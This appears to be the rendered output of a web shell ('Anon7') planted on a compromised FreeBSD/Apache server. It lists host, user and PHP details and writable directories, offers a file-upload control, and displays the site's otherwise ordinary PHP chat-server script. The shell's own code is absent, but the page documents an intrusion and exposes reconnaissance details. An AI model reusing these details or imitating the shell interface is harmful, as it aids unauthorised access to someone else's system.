KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.4.62
System : FreeBSD fbsdweb2.web.rcn.net 14.1-RELEASE FreeBSD 14.1-RELEASE releng/14.1-n267679-10e31f0946d8 GENERIC amd64
User : www ( 80)
PHP Version : 8.3.8
Disable Function : NONE
Directory :  /domains/conceptlabs1/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /domains/conceptlabs1/chat.php
#!/usr/bin/php -q

<?php
error_reporting(E_ALL);

include_once 'common.php';
include_once 'classes/class.Process.php';
require_once 'server/Server.class.php';
require_once 'server/Client.class.php';

set_time_limit(0);
// date_default_timezone_set('Asia/Calcutta');

// variables
// $address = '127.0.0.1';
$verboseMode = true;
// $rootpath = '/var/www';
$server = new Server($address, $port, $verboseMode);
$server->run();
// command to start server: sudo -u www-data php -q chat.php
?>

Anon7 - 2021